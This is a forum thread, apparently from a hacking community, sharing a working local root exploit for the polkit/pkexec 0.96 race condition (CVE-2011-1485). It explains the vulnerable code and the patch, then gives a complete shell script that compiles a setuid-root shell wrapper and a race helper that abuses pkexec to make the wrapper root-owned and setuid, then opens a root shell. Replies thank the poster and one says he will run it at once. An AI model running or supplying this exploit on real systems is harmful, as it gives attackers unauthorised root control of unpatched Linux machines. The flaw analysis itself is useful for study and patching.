Linux pkexec and polkitd 0.96 race condition privilege escalation

[ev1lut10n]

exploit download:
http://packetstormsecurity.org/files/vie...xec.sh.txt

Brief Descriptions

thanks to : thanks to all devilzc0de crews and members, X-hack,Danzel


src/polkit/polkitunixprocess.c where it fails to clarify the real uid, under this race condition it will return the effective one.
on : polkit_unix_process_get_owner (PolkitUnixProcess *process,
g_snprintf (procbuf, sizeof procbuf, "/proc/%d", process->pid);
if (stat (procbuf, &statbuf) != 0)
{
g_set_error (error,
POLKIT_ERROR,
POLKIT_ERROR_FAILED,
"stat() failed for /proc/%d: %s",
process->pid,
g_strerror (errno));
goto out;
}
where the code only rely on stat of the pseudo filesystem

src/polkit/polkitsubject.c ---------> there's not enough validation to run polkit_unix_process_new

on polkit_subject_from_string (const gchar *str,
there's no enough validation before launching polkit_unix_process_new
if (g_str_has_prefix (str, "unix-process:"))
{
val = g_ascii_strtoull (str + sizeof "unix-process:" - 1,
&endptr,
10);
if (*endptr == '\0')
{
subject = polkit_unix_process_new ((gint) val);

the fix is to add more validations (polkit_unix_process_new_for_owner,polkit_unix_process_new_full,polkit_unix_process_new_full):

if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT ":%d", &scanned_pid, &scanned_starttime, &scanned_uid) == 3)
{
+ subject = polkit_unix_process_new_for_owner (scanned_pid, scanned_starttime, scanned_uid);
+ }
+ else if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT, &scanned_pid, &scanned_starttime) == 2)
+ {
+ subject = polkit_unix_process_new_full (scanned_pid, scanned_starttime);
+ }
+ else if (sscanf (str, "unix-process:%d", &scanned_pid) == 1)
+ {
+ subject = polkit_unix_process


src/polkitbackend/polkitbackendsessionmonitor.c
function polkit_backend_session_monitor_get_user_for_subject (PolkitBackendSessionMonitor

if (POLKIT_IS_UNIX_PROCESS (subject))
{
GError *local_error;

local_error = NULL;
uid = polkit_unix_process_get_owner (POLKIT_UNIX_PROCESS (subject), &local_error);


as we may see from above code : "polkit_unix_process_get_owner" will not avoid "Time of Check to Time of Use Problem"
http://www.usenix.org/events/fast05/tech...ei/wei.pdf


src/programs/pkexec.c
pkexec doesn't use the uid of parent process had and will still continue when the parent die :

pid_of_caller = getppid ();
if (pid_of_caller == 1)
{
pid_of_caller = getpgrp ();
}

subject = polkit_unix_process_new (pid_of_caller);


where it will continue even if the parent is dead.

where the patch has been applied by adding prctl to check the death signal of the parent process (PR_SET_PDEATHSIG):

if (prctl (PR_SET_PDEATHSIG, SIGTERM) != 0)
+ {
+ g_printerr ("prctl(PR_SET_PDEATHSIG, SIGTERM) failed: %s\n", g_strerror (errno)); /**So if our parent die goto out***/
+ goto out;
+ }


pkexec.sh

Code:

#!/bin/sh

<<COMMENT1

Exploit Title: Linux pkexec and polkitd 0.96 race condition privilege escalation
Date: Sun Oct  9 00:31:10 WIT 2011
Author: Ev1lut10n
About Ev1lut10n:
http://jasaplus.com/ev1lut10n
A Chinese Man Lives in Indonesia
Software Link: http://pkgs.fedoraproject.org/repo/pkgs/polkit/polkit-0.96.tar.gz/e0a06da501b04ed3bab986a9df5b5aa2/
Version: 0.96
Tested on: 2.6.35-22-generic #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC 2010 i686 GNU/Linux under Gnome Environment
CVE : CVE-2011-1485

Brief Descriptions

src/polkit/polkitunixprocess.c  where it fails to clarify the real uid, under this race condition it will return the effective one.
on : polkit_unix_process_get_owner (PolkitUnixProcess *process,
  g_snprintf (procbuf, sizeof procbuf, "/proc/%d", process->pid);
  if (stat (procbuf, &statbuf) != 0)
    {
      g_set_error (error,
                   POLKIT_ERROR,
                   POLKIT_ERROR_FAILED,
                   "stat() failed for /proc/%d: %s",
                   process->pid,
                   g_strerror (errno));
      goto out;
    }
where the code only rely on stat of the pseudo filesystem

src/polkit/polkitsubject.c ---------> there's not enough validation to run polkit_unix_process_new

on  polkit_subject_from_string (const gchar *str,
there's no enough validation before launching polkit_unix_process_new
if (g_str_has_prefix (str, "unix-process:"))
    {
      val = g_ascii_strtoull (str + sizeof "unix-process:" - 1,
                              &endptr,
                              10);
      if (*endptr == '\0')
        {
          subject = polkit_unix_process_new ((gint) val);

the fix is to add more validations (polkit_unix_process_new_for_owner,polkit_unix_process_new_full,polkit_unix_process_new_full):

if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT ":%d", &scanned_pid, &scanned_starttime, &scanned_uid) == 3)
         {
+          subject = polkit_unix_process_new_for_owner (scanned_pid, scanned_starttime, scanned_uid);
+        }
+      else if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT, &scanned_pid, &scanned_starttime) == 2)
+        {
+          subject = polkit_unix_process_new_full (scanned_pid, scanned_starttime);
+        }
+      else if (sscanf (str, "unix-process:%d", &scanned_pid) == 1)
+        {
+          subject = polkit_unix_process


src/polkitbackend/polkitbackendsessionmonitor.c
function polkit_backend_session_monitor_get_user_for_subject (PolkitBackendSessionMonitor

if (POLKIT_IS_UNIX_PROCESS (subject))
    {
      GError *local_error;

      local_error = NULL;
      uid = polkit_unix_process_get_owner (POLKIT_UNIX_PROCESS (subject), &local_error);


as we may see from above code : "polkit_unix_process_get_owner" will not avoid "Time of Check to Time of Use Problem"
http://www.usenix.org/events/fast05/tech/full_papers/wei/wei.pdf


src/programs/pkexec.c
pkexec doesn't use the uid of parent process had and will still continue when the parent die :

  pid_of_caller = getppid ();
  if (pid_of_caller == 1)
    {
           pid_of_caller = getpgrp ();
    }

  subject = polkit_unix_process_new (pid_of_caller);


where it will continue even if the parent is dead.

where the patch has been applied by adding prctl to check the death signal of the parent process (PR_SET_PDEATHSIG):

if (prctl (PR_SET_PDEATHSIG, SIGTERM) != 0)
+    {
+      g_printerr ("prctl(PR_SET_PDEATHSIG, SIGTERM) failed: %s\n", g_strerror (errno)); /**So if our parent die goto out***/
+      goto out;
+    }


COMMENT1



cat > suid.c << _EOF
#include <stdio.h>
#include <string.h>
int main(int argc,char *argv[])
{
char *root=malloc(1000);
char perintah[256]="/bin/sh -c ";
int i;
char *spasi=" ";
       strcat(root,perintah);
      for (i=1;i<argc;i++)
      {
        strcat(root,argv[i]);
        strcat(root,spasi);      
      }    
setuid(0);
setgid(0);
system(root);
}
_EOF



cat > makesuid.c << _EOF
/**this code was modified from http://www.exploit-db.com/exploits/17932/  by zx2c **/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
int main(int argc, char **argv)
{
     if (fork() != 0)
    {        
        int fd;
        char pid_path[15];
        sprintf(pid_path, "/proc/%i", getpid());
        close(0); close(1); close(2);
        fd = inotify_init();
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        read(fd, NULL, 0);
        execl("/usr/bin/X", "X", NULL);    
    }  
    else
    {
            execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL);
    }

    return 0;
}

_EOF


gcc -o /tmp/suid suid.c
gcc -o makesuid makesuid.c
./makesuid chown root:root /tmp/suid
./makesuid chmod u+s /tmp/suid
echo "your suid is on /tmp/suid make sure u move this !!!"
/tmp/./suid -c /bin/sh

[mariachi]

wow..... :

privilege escalation, nyobain ah barangkali beruntung bisa dapet root.....

[X-h4ck]

Thanks and Good Job bro :)

[nubi3]

thanks om, langsung eksekusi